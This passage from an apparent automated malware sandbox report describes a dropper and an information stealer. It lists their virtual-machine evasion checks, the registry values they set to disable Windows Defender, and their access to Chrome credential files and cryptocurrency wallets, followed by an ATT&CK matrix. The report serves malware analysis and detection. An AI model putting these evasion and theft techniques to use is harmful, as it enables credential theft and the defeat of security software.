                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe TID: 3136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe TID: 3644Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe TID: 972Thread sleep count: 1172 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe TID: 4624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWindow / User API: threadDelayed 1172Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2451
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00975467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00975467
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00972390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_001A2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A82390
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: bAS06bx.exe, 00000005.00000003.393709063.0000000000F41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                          Source: bAS06bx.exe, 00000005.00000003.393709063.0000000000F41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareS8SKR55DWin32_VideoControllerVR_9GN8GVideoController120060621000000.000000-00001272173display.infMSBDAD2NSCP_KPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors9VBR253Gq
                          Source: bAS06bx.exe, 00000005.00000002.395026576.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000003.388641612.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00972F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976F40 SetUnhandledExceptionFilter,0_2_00976F40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00976CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A6F40 SetUnhandledExceptionFilter,1_2_001A6F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_001A6CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A86F40 SetUnhandledExceptionFilter,2_2_00A86F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A86CF0

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: aRe53.exe.2.dr, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                          Source: bAS06bx.exe.2.dr, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                          Source: 3.0.aRe53.exe.5e0000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_009718A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00977155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00977155
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00972BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeCode function: 3_2_00007FF815F6077D GetUserNameA,3_2_00007FF815F6077D

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: bAS06bx.exe, 00000005.00000002.395026576.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000003.393709063.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bAS06bx.exe PID: 1256, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPED
                          Source: Yara matchFile source: 0.3.file.exe.4ce3420.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4ce3420.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: Yara matchFile source: Process Memory Space: bAS06bx.exe PID: 1256, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: bAS06bx.exe PID: 1256, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPED
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts221
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          21
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium2
                          Encrypted Channel
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts12
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          11
                          Obfuscated Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol2
                          Data from Local System
                          Exfiltration Over Bluetooth1
                          Non-Standard Port
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)1
                          Access Token Manipulation
                          1
                          Timestomp
                          Security Account Manager1
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                          Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          Logon Script (Mac)1
                          Windows Service
                          1
                          DLL Side-Loading
                          NTDS127
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Process Injection
                          2
                          Bypass User Access Control
                          LSA Secrets331
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common1
                          Masquerading
                          Cached Domain Credentials11
                          Process Discovery
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup Items231
                          Virtualization/Sandbox Evasion
                          DCSync231
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                          Access Token Manipulation
                          Proc Filesystem1
                          Application Window Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Process Injection
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                          Rundll32
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
